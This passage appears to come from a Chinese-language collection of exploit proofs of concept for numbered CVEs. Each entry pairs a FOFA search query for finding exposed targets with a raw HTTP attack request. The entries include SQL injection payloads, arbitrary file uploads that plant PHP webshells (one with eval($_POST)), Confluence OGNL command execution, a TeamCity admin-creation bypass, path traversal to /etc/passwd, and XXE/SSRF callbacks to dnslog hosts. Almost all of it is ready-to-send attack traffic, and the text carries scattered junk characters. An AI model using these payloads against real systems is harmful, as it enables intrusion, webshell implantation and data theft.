; p+ j* S+ b. w# L8 {1 b# t- MHost: x.x.x.x4 k; u7 `) ?, \& a" T
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
! X8 K% O# C# s* Q9 g' p; f' [( OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
! g, @1 j, g! P" M$ TAccept: */*
; a% i" z% W3 x$ r' U  \, tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 _, L$ S. e2 @9 RAccept-Encoding: gzip, deflate
3 f8 u% {6 R- u1 y+ I  J8 OContent-Type: application/x-www-form-urlencoded;: I4 u$ ~/ g1 P
Content-Length: 109
6 E* W2 E, B% h' Q9 J* ZOrigin: https://58.18.133.60:8443
, T% h7 `( J( OReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php! \* H  M' x. k% Z) m( z: y2 t2 |6 _$ c
Sec-Fetch-Dest: empty
; [) R" ^! f" s, B0 xSec-Fetch-Mode: cors
& v& f/ S" l$ \5 R8 OSec-Fetch-Site: same-origin- @- V1 S1 i( G# ^5 `7 l' J
X-Forwarded-For: 1.1.1.16 j; |: ?, U; p3 {2 v! D6 r" R
X-Originating-Ip: 1.1.1.10 N. _4 `2 i7 A! u. G( R2 f/ G1 T
X-Remote-Ip: 1.1.1.1
# ]0 i" T; b4 L/ D. nX-Remote-Addr: 1.1.1.1
4 z4 Q2 X/ F* x$ a9 h9 \: MTe: trailers/ @" M8 ?6 X, k/ a; y
Connection: close
7 `4 T9 q2 Q- ~% L* \
* j# _( W3 @8 [3 O# ^6 S" jsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456) J3 x: ]3 M8 R/ ~5 `
6 X( ]% E( C' T1 Z8 I  X7 o) z
. w& T% ?4 T8 ?
120. 北京百绰智能S40管理平台导入web.php任意文件上传$ U" y/ w% q+ Q0 J2 E( y7 `
CVE-2024-1253
! ~. m7 _: n! X' v5 ?2 a0 T5 nFOFA:title="Smart管理平台"
: f. F: v" \- S; b% i& mPOST /useratte/web.php? HTTP/1.1/ Q! Q. ^. Y0 ]
Host: ip:port
0 S  f3 \0 W( I  jCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
* s* v5 C9 t( j" jUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko2 ~# N2 I  {: C% i; ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" T' j. q4 I6 \' G) m4 j( t8 {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ s6 C- a& P) Q
Accept-Encoding: gzip, deflate6 k) d2 ?( [5 w2 O- L& }
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328; `! T  I% L7 c! w; Z$ N# c" q
Content-Length: 5972 l5 O9 K% E8 _' q6 s5 \
Origin: https://ip:port
4 E* b9 e4 L4 |" ^/ wReferer: https://ip:port/sysmanage/licence.php
9 v/ i1 y) F$ _0 cUpgrade-Insecure-Requests: 1
8 `5 X# P+ }1 x0 I" kSec-Fetch-Dest: document  {( F3 o- Z% |
Sec-Fetch-Mode: navigate( J! z! F  N6 |' C+ N* t3 H2 ~
Sec-Fetch-Site: same-origin
) ?6 p0 m4 O1 x) p: D- RSec-Fetch-User: ?15 z' {* p( X+ f) I) y, X8 o- @: e) I
Te: trailers
& ~- p. u9 r: |. f. _- mConnection: close* ~4 h6 O/ u1 B+ w
, O. o0 `/ |8 W; d& c
-----------------------------42328904123665875270630079328
* b1 T' A2 H" r- i+ ?5 D0 R4 NContent-Disposition: form-data; name="file_upload"; filename="2.php"- A; l: v0 U+ w/ O
Content-Type: application/octet-stream( U5 a4 c. T* ?/ W) }  ~8 c
* f! ?& w1 S8 F0 b: n  {6 F
<?php phpinfo()?>" R9 S4 G5 H1 L; ^. T
-----------------------------42328904123665875270630079328* m- X, c: a- B
Content-Disposition: form-data; name="id_type"6 \6 u* W2 V( O. q8 c

8 ]1 T' R$ J! F4 o- D, T8 g1
6 m& E9 H5 R8 v1 x-----------------------------42328904123665875270630079328
' B& i# E1 y2 v, qContent-Disposition: form-data; name="1_ck"  N; k2 R/ S, V. K3 c* B
0 q* M* s( R6 q& d% Q/ F: S$ d4 g, Q
1_radhttp
# P5 _( ?3 |. B! u& t5 M-----------------------------42328904123665875270630079328( l. ?  c& K5 t6 t) j7 e
Content-Disposition: form-data; name="mode"
9 f6 M0 [9 k* C% l* j9 i2 P7 K$ h* p8 [, `
import
/ D* v) a" I5 z5 X- W-----------------------------42328904123665875270630079328; P2 ?/ n+ v, |. w0 [4 k

/ E! Y% t: V! [! k8 F2 M3 H( H" y9 u9 y/ `! l
文件路径/upload/2.php
3 P$ J$ V% P) f( \4 C2 I, }# ~( j0 k. g. R' E5 W, d7 w' r3 w
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
) `) k0 q2 T; ^' xCVE-2024-1918
7 s- Y& R2 V+ q. OFOFA:title="Smart管理平台"! V9 E: U$ R+ W0 m  I
POST /useratte/userattestation.php HTTP/1.1" A3 `) G  C+ }) C
Host: 192.168.40.130:8443
8 Z, G) y4 U# l' mCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac508 x7 N2 n! d% d  ^6 L7 I& q, l
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko, n/ |, X, ?" `5 o* s3 Y: ~8 c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" _0 W+ P0 l, n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: y! U) `. t) m# R: n% n
Accept-Encoding: gzip, deflate( f1 f3 f! d. E6 u
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793287 f- d$ o1 z, H% t
Content-Length: 592" x) |8 z2 N$ e# O/ D
Origin: https://192.168.40.130:8443
6 g1 K2 r' T/ }' F6 `Upgrade-Insecure-Requests: 1) Z1 y8 |. |  ], i/ J
Sec-Fetch-Dest: document* Y! [8 K* b5 N  d3 q
Sec-Fetch-Mode: navigate: E& U: ]: H( r9 Z3 A# G9 s
Sec-Fetch-Site: same-origin3 b+ x) S6 }( j$ a9 t
Sec-Fetch-User: ?1
1 B8 _2 |( R, [9 ?7 J, m5 fTe: trailers% k! j8 d9 P5 h5 [
Connection: close
, m+ L- ]6 l5 K# H) N4 b( b4 H! O) ?
  J0 p3 }) T, V-----------------------------423289041236658752706300793284 p. e$ K* R6 R2 b+ q
Content-Disposition: form-data; name="web_img"; filename="1.php"
$ }& f. ]5 o3 s& S# oContent-Type: application/octet-stream
9 Q# J/ f9 _( Z. r4 c/ d# k
0 D1 S' |/ V( `% Y) _<?php phpinfo();?>
8 {8 Z7 o" w$ }-----------------------------423289041236658752706300793281 L4 r) V# @9 O# Y* C5 s6 h& K8 }9 F% M
Content-Disposition: form-data; name="id_type"
  N7 x1 d* E. X" T" @. n# n5 v$ K
4 t( r. c- b" a1
3 i2 V. l+ R; ^% Q3 O5 \& J7 b-----------------------------42328904123665875270630079328" n; {5 V. W( P1 s) p
Content-Disposition: form-data; name="1_ck"
/ K3 ?$ @7 z- K; ^* Z8 G& s$ H; U% \2 f
1_radhttp
, g4 K7 I  ~0 [. ~2 ?-----------------------------423289041236658752706300793284 d. f1 J: h7 m6 e4 z; b
Content-Disposition: form-data; name="hidwel"
/ o' {# O9 T6 k( C0 l7 Z3 q' _. p3 z2 Q. X- o  V5 B& e8 T% S
set
- Z4 W% {/ m' y& m2 F& J-----------------------------42328904123665875270630079328$ |* Z& I( K6 k1 Q  P
3 w; {1 L! H' q6 L- j
3 h1 W* U5 p8 M3 l, ~( F
boot/web/upload/weblogo/1.php9 h  Y: g- `4 x4 c
: i( g6 e, v+ O0 t) x
122. 北京百绰智能s200管理平台/importexport.php sql注入- |. D- q9 @) x. }4 {. Y
CVE-2024-27718FOFA:title="Smart管理平台"
+ _) g' x+ q: ]& m5 g7 W; N其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
( n3 j+ z9 _$ j) @# G) ~5 d4 hGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.12 N  {/ y2 v7 K4 K' N% g# H9 [
Host: x.x.x.x* u$ w; f; K/ O+ @# C; N/ b/ v  ^
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
0 k/ a3 q" e& V2 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
/ R6 H2 x5 m  R3 b  r( i# wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; {5 @5 ^8 d# f% T5 S% U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ \5 T2 S# K2 |$ l
Accept-Encoding: gzip, deflate, br* S/ Q$ F+ }, O; G4 ]. s
Upgrade-Insecure-Requests: 1
' n. s5 O/ n' _) [; NSec-Fetch-Dest: document  O3 A2 n( T% c0 ?
Sec-Fetch-Mode: navigate7 x) L6 z: d9 u& m
Sec-Fetch-Site: none0 W  I4 m4 A) A+ Y7 m, Q
Sec-Fetch-User: ?1. N* U/ E- a! l5 M* z7 Q+ W
Te: trailers
, F5 e  Q! G  F8 z0 yConnection: close. ]* `' g: e% L# I

+ e* Y% {5 G; I- |3 x6 T3 F. N& E: D6 _4 b( j' ^2 L" |
123. Atlassian Confluence 模板注入代码执行
3 `* S; f6 N9 @3 z* fFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
5 Z1 E" O$ m& J* a5 qPOST /template/aui/text-inline.vm HTTP/1.1
, t6 r: G# L5 a) s7 p" mHost: localhost:8090
! f7 T; T) ~% b- Q. P: R8 GAccept-Encoding: gzip, deflate, br2 w9 V# v# w# C4 f; x" F
Accept: */*
- T! x5 W7 x' m" e) c8 vAccept-Language: en-US;q=0.9,en;q=0.8# @( [' i' q$ q: t1 P# ~  J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36  \" v& E: S5 B5 C7 F* e
Connection: close
% [9 G: |( V, r: i, _) l4 O3 TContent-Type: application/x-www-form-urlencoded
7 Q  h% a& u. K7 S1 k5 w/ q
) k8 u5 @4 I1 e8 I' b' R: plabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))/ v# K! u5 a6 w" r" E3 Y1 i

9 K1 O# z9 Y( M) B8 u
+ f" I# S) {+ G8 v4 q+ t5 z  ?124. 湖南建研工程质量检测系统任意文件上传
2 V+ o! W- z' F5 \! X" S. ^# lFOFA:body="/Content/Theme/Standard/webSite/login.css"
- x  Q6 a$ l' `7 jPOST /Scripts/admintool?type=updatefile HTTP/1.1
4 Y( G; ^( J2 A+ XHost: 192.168.40.130:8282
3 X+ B" c# R% z5 [$ J6 c( GUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
1 H2 `4 p) s; `; j& q; @! R/ pContent-Length: 72
( j6 o5 [  t$ f. hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  d- w9 p  ~  A* |/ \4 {; yAccept-Encoding: gzip, deflate, br( ]9 z: w- H- q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' B) P: R$ [  b5 }1 tConnection: close! _; N' C5 [% `& r
Content-Type: application/x-www-form-urlencoded6 v9 B+ x- U# H) H. Q. R0 _

+ o* n9 W1 K) Q5 U5 @% ufilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
, q9 F* \+ L7 u' q/ m6 @( d# q" D5 h' R( [# @
/ ~: l0 X: J6 X5 \9 f, u
http://192.168.40.130:8282/Scripts/abcgcg.aspx
( s% b  j. j) c: }7 C1 ~$ u( }* ~6 v, i$ P
! j1 D" v2 Q) j# w+ f: h125. ConnectWise ScreenConnect身份验证绕过
; x; e" r1 Y& o! v: ^) J2 l5 oCVE-2024-1709
; _8 Q  ?0 l& u# ~, N. r( f- zFOFA:icon_hash="-82958153"  u8 Y/ j+ g; w# o5 {
https://github.com/watchtowrlabs ... bypass-add-user-poc+ m$ k) T* ^1 i: r$ h1 S% d  f

" l' o5 v0 l9 P2 E! p8 `
6 D- @. A3 }- m8 B8 F使用方法! c/ t3 E/ W) G8 S
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!1 a  Y' a9 P. Q+ i

& e) J; C1 K0 t+ j5 N, _; i0 n$ I8 x% K; X8 f3 e( f* G- a
创建好用户后直接登录后台,可以执行系统命令。
; B; s0 s8 H; Q8 f& r+ E3 ~
+ |# p* K& D' }1 l: d126. Aiohttp 路径遍历
( t& p7 E+ _3 G5 ^" o' _FOFA:title=="ComfyUI"% b) R% d7 D  T& R6 w: g
GET /static/../../../../../etc/passwd HTTP/1.1
' r# j7 v4 [7 L4 A$ w. ~6 B9 _Host: x.x.x.x
" @8 u  }6 u- O/ C/ v# c% lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
5 k) T; k. C% H6 f4 fConnection: close
5 Y1 N; b7 R& q$ p: l1 aAccept: */*
# V$ i  @8 t* q" R0 H2 ?/ |* C  U8 R9 pAccept-Language: en- |# v5 H/ e% Q0 V. ~( I
Accept-Encoding: gzip7 u/ N3 }. {8 z6 x, D) ?4 F

$ l1 ^& O- K: A' _6 X1 [+ K
4 F: }8 ~1 X9 d# L127. 广联达Linkworks DataExchange.ashx XXE
+ ^& @. _  u* j# z( \$ l% ]# \; F3 X& qFOFA:body="Services/Identification/login.ashx"
+ s4 {; x& _& ]/ O: a* c  QPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1  _. _# ]; o( `" d& @- E6 l( u5 X% ]
Host: 192.168.40.130:88885 [: x* H0 m# |; r5 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36. ~0 A3 @3 E- S, A5 H: s6 G* X
Content-Length: 415
7 q  r% R' D/ g# `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( f3 a' Q+ F9 P- [. {$ V7 [; f4 H
Accept-Encoding: gzip, deflate3 B* t0 T- z" u( ~- S
Accept-Language: zh-CN,zh;q=0.9; @* [7 s  B: C3 m$ F+ Q2 \
Connection: close
* H, F2 Y" Z( e& k+ [; ^2 EContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0% n" [; R% G" F* _% C
Purpose: prefetch
9 f9 k) W! z$ {. |# |5 [. y0 ISec-Purpose: prefetch;prerender' R3 {) h, N4 N2 c+ I* l

9 f! M1 i  d8 p: f! m, _2 q------WebKitFormBoundaryJGgV5l5ta05yAIe0# w3 ~/ D& ?, I' N  h
Content-Disposition: form-data;name="SystemName"6 _/ D. e$ l: q  u. f0 P$ M

$ U2 F/ O) F- w1 gBIM7 w6 B6 Z' M" N( F4 h& `& L
------WebKitFormBoundaryJGgV5l5ta05yAIe05 b# S& a2 u/ ?. w' h; ?% y8 M
Content-Disposition: form-data;name="Params"
/ P/ v; E2 _% g$ q; U' q- k$ fContent-Type: text/plain( i' I* i6 p6 N  u- W: H& \

: u# V' W0 ~2 c0 |3 ]<?xml version="1.0" encoding="UTF-8"?>; W) d) J, d6 L4 }" V/ U
<!DOCTYPE test [! |8 a# S- ^8 `0 R
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
4 O; U% V, ~8 |0 Z' f]2 P. \8 H/ Y5 r* i2 o" T/ t
>, p0 x* T' @: y2 u2 `4 P
<test>&t;</test>
% F, K; o/ u; V3 K------WebKitFormBoundaryJGgV5l5ta05yAIe0--
+ k4 q$ H% O+ W& D" C! ~5 `6 J" T  x
, q5 F3 O% _1 O  F& y

* U) Q- a) j3 S5 N128. Adobe ColdFusion 反序列化3 R& V# x  [9 _) L) j' P4 X
CVE-2023-38203
0 M4 S) R& ?1 ^Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
1 m" n3 A! }8 g3 V( Z" H' `FOFA:app="Adobe-ColdFusion": G2 q0 t' X: l
PAYLOAD8 x9 i5 a8 s! Y" q# w4 {; b  _
# s; t; e4 i# F' k
129. Adobe ColdFusion 任意文件读取
6 k5 @7 f, ^) u- S# z1 N. S$ MCVE-2024-20767
" u9 N8 I; U: I/ p- d& eFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
9 s6 F1 a" K$ b9 h0 e' t9 @第一步,获取uuid4 Q6 M* V3 g) W* l
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
# Z8 w) ?% c7 L5 ~# c7 G+ hHost: x.x.x.x4 B& B3 y$ V. V) g+ d5 ]% X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
% _5 P. }) V% L" ?Accept: */*# r9 e% z4 U( n
Accept-Encoding: gzip, deflate$ e2 H6 w4 E1 k7 G6 Z5 l
Connection: close! x; f7 k! n9 W' F* b

3 ]6 ]1 f6 v! J+ J; K9 U) c8 v& l" J2 {" c9 {3 U2 y
第二步,读取/etc/passwd文件1 @7 J( u" j4 e# ~/ C
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
. ?7 d6 C1 f% M/ T% |1 FHost: x.x.x.x
$ P0 X4 |4 N# P* x7 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
6 p! I$ k6 W$ |/ V# R. A  UAccept: */*
5 c- S% K% J2 t4 vAccept-Encoding: gzip, deflate
* ?$ r! @$ L0 I5 i, oConnection: close+ K9 k, l# S2 f+ l4 \  ]! N6 I
uuid: 85f60018-a654-4410-a783-f81cbd5000b9: _" f: H9 W5 e5 y& U
! T6 D  k4 ^# d8 ^

0 k, r9 T( A0 A& g# A2 F- s130. Laykefu客服系统任意文件上传
1 e1 S% p8 j' V2 {3 l8 gFOFA:icon_hash="-334624619"
+ P$ @% q7 z: K  V8 f) j2 n# UPOST /admin/users/upavatar.html HTTP/1.1' o' \+ |, S  U9 O# [: w
Host: 127.0.0.10 F0 K# b* s3 N! }1 U* U# m
Accept: application/json, text/javascript, */*; q=0.01# k3 G" ~0 F( Z( {1 a  V( E
X-Requested-With: XMLHttpRequest$ N, {3 u+ z! r* U7 U7 a% W+ H
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26# {" @, ?: Z0 M1 b  S
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
  O1 {: T$ Y+ l( ^9 qAccept-Encoding: gzip, deflate
2 t# J3 t- ~$ N  w2 f0 ^Accept-Language: zh-CN,zh;q=0.9$ ]# k+ L. C7 e9 l
Cookie: user_name=1; user_id=3
" v, D9 b% p2 BConnection: close
- I/ g/ Y1 b0 F+ t8 _& L
9 m+ b5 d; J2 k5 }# m, n% ?( S------WebKitFormBoundary3OCVBiwBVsNuB2kR9 v: O8 R, \0 T  [: `
Content-Disposition: form-data; name="file"; filename="1.php"2 r/ f6 O- g8 G3 ]! P* x8 w
Content-Type: image/png* C8 G8 n. S- U' M/ W5 N; [$ e

) U8 P) u" F% _6 t<?php phpinfo();@eval($_POST['sec']);?>( j& ?2 i& L0 Q" I, s
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
1 M4 p: F( u# u( i7 u+ R7 ~+ S$ x7 |. X5 C( O  T

5 D& z3 O: L  `( D3 f131. Mini-Tmall <=20231017 SQL注入( r  g) u3 T$ b& V  W
FOFA:icon_hash="-2087517259"
; g! i5 U& `( d, p0 t后台地址:http://localhost:8080/tmall/admin
2 n) D. ^6 N* P2 C  lhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
. T* D" _& R6 Y5 z5 W  h9 |$ ~( `  A/ l7 c- z
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
! s. P  G+ O  {CVE-2024-27198
$ f( F! u8 N7 `$ hFOFA:body="Log in to TeamCity", N+ F- P' B! v. V1 Q0 o  L
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1* P: f; {& }6 u
Host: 192.168.40.130:8111
" K# L& |* T0 j& A- @; l" uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 \- I# Y2 C3 f+ _) ~
Accept: */*
+ J6 h8 @, S& l  nContent-Type: application/json
3 C! I: l! Q" F( NAccept-Encoding: gzip, deflate
4 h6 v0 N5 ~5 _( R+ B
4 A- W+ Y: l8 }* ]0 c{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}1 \( q& N3 R8 G/ r& h

0 o* w0 q3 b/ z; g" e
4 N# c$ H3 z2 m9 ]+ v$ YCVE-2024-27199
' k6 p& k) W+ t, o  d0 t* ^/res/../admin/diagnostic.jsp
) Z8 J* c% X* V! A8 I6 W' m8 t/.well-known/acme-challenge/../../admin/diagnostic.jsp# ]& h3 R# O3 X0 ]+ P7 A
/update/../admin/diagnostic.jsp
0 K, `9 \6 ]; s( l% L  t% M, ?# E( k; A, y' a5 u5 J

. ^6 u% F& {/ n2 q) v1 b" W( JCVE-2024-27198-RCE.py
5 `. {  h( s  o0 H5 _" a
7 D; q/ A0 W. R133. H5 云商城 file.php 文件上传/ C0 q& G2 G6 }& ~7 Q# x
FOFA:body="/public/qbsp.php"
" l( x1 ?* s% h, o. Q# h! `5 o8 NPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1  l; x9 i( W, A3 T" L& w
Host: your-ip+ H/ X: T. B$ c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
' ?  d/ ]4 b4 |1 W0 z* C2 j% {" IContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
/ Q8 q; V3 j. e  y/ z% }: ?+ V- ]! I' U3 M5 d0 [5 P3 ^4 B& ~
------WebKitFormBoundaryFQqYtrIWb8iBxUCx; g1 u( u0 ?. K
Content-Disposition: form-data; name="file"; filename="rce.php"
9 Q5 v4 e$ Y0 B- Q4 v, l4 X" vContent-Type: application/octet-stream! w$ r: s( v: Y  n) T7 U

$ z' _/ u. K8 F  F$ _- a<?php system("cat /etc/passwd");unlink(__FILE__);?>- s/ P* k; i- F' J5 R$ M$ G7 x
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
' g$ ~8 L! K% J- ~
8 |4 e0 x/ Y: m- R, o. r+ [# I, w" V- b- G  U
, ]9 c" ]* T0 w. v( Z2 L3 B
134. 网康NS-ASG应用安全网关index.php sql注入
  C1 O+ u! [* i2 C' PCVE-2024-23301 y3 ^1 u# R( ?# ^1 _$ |
Netentsec NS-ASG Application Security Gateway 6.3版本5 X- z" }$ y. m) ~
FOFA:app="网康科技-NS-ASG安全网关"
1 h3 S9 D* R9 W0 }POST /protocol/index.php HTTP/1.1
, w) f' Y# g( I  {& d( Z+ O  dHost: x.x.x.x
. V7 R1 H7 M; B! x: e$ B+ ~4 S- d( lCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de8 N( Y3 Z6 ~6 v0 Y8 {- z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.02 H3 [) r* n8 }5 Z: Q$ S. h3 |
Accept: */*
( V% k+ O$ s$ V% Y- ^& K1 |9 rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% ]9 f. K7 R0 e$ i+ g/ c- jAccept-Encoding: gzip, deflate" f2 p, E9 O. f+ k
Sec-Fetch-Dest: empty+ W, Q& ^7 _' d; i
Sec-Fetch-Mode: cors
, ?! I6 J) k7 f. |) q8 ]+ X( eSec-Fetch-Site: same-origin9 [0 o  @, ^, f) H% }0 ^; K2 N
Te: trailers6 ]! D9 u$ }$ e6 Z
Connection: close
( b; m# Y$ d" CContent-Type: application/x-www-form-urlencoded9 |  H9 F1 c4 T$ s6 x1 }& O  I3 O
Content-Length: 2633 ^  Y+ k3 s* x6 x, i* e0 O0 {9 V* Y

2 I( m7 `4 L- W+ [jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
* f* E2 P6 x  u
8 L& r. z( z- f, G0 J5 x4 R
* ~5 |, L9 D2 R) v+ @: f135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
* T' @" p2 C- C3 {' v& GCVE-2024-2022% d; F9 g- m* V( F
Netentsec NS-ASG Application Security Gateway 6.3版本
4 ^8 g+ O* {$ U4 B* lFOFA:app="网康科技-NS-ASG安全网关"
( x4 C& O7 {( ~: u' s7 VGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.18 U% |. V6 Y* R: K) a9 z) Z
Host: x.x.x.x
$ _# c$ m0 ~, q; P5 H0 j( r! uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36+ _) R4 t( \# E, C4 t2 h" A: }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. [0 G7 L7 N! m0 c7 k: t% CAccept-Encoding: gzip, deflate
4 i4 N# N% U4 t/ I% X, M& `- K* V2 DAccept-Language: zh-CN,zh;q=0.9
. u0 D6 ~0 L$ _% N! O5 BConnection: close
' e/ R/ I+ G% }* r% G  A. V8 x; t6 _3 ~$ T7 Y9 v9 q

1 E3 E7 Z/ h. E! o7 X& Q136. NextChat cors SSRF9 A( y8 ~6 z7 k8 e) E$ T
CVE-2023-49785% Z' F" g; x# t- m) k! s
FOFA:title="NextChat"6 V" h  e( m$ R" B* H4 x) g* Q
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
9 S3 `5 }; B$ vHost: x.x.x.x:10000
* `  V' s# N; uUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 e" X# F; X& V+ Q- |& w* D( z) {Connection: close
" Z. [7 |( K/ _5 i1 M$ yAccept: */*
0 ]- e9 p' k& z5 Y* H# D8 W6 kAccept-Language: en8 H* @& V( D2 m4 u
Accept-Encoding: gzip
! Z3 f; x. j! [, z2 M: p* o4 h# y7 c

) Y# Z, {) [# s% n) U! N9 {: N& F137. 福建科立迅通信指挥调度平台down_file.php sql注入
# |, {1 M: T6 f1 }7 `+ pCVE-2024-26203 p0 K7 X- @* J* v
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"8 D  @6 ]3 Y6 m) B! G
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1! o- \9 a2 ^. s/ A
Host: x.x.x.x
* q: X4 E3 b6 [# n0 P: bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.06 ?7 R2 v" O1 Z3 v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  i  G3 u& M3 I  }, ~" Z5 \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# v& i1 D, X" G8 iAccept-Encoding: gzip, deflate, br9 B! e3 W1 c$ u/ N7 S
Connection: close4 K, v4 f( C* s9 E  }
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
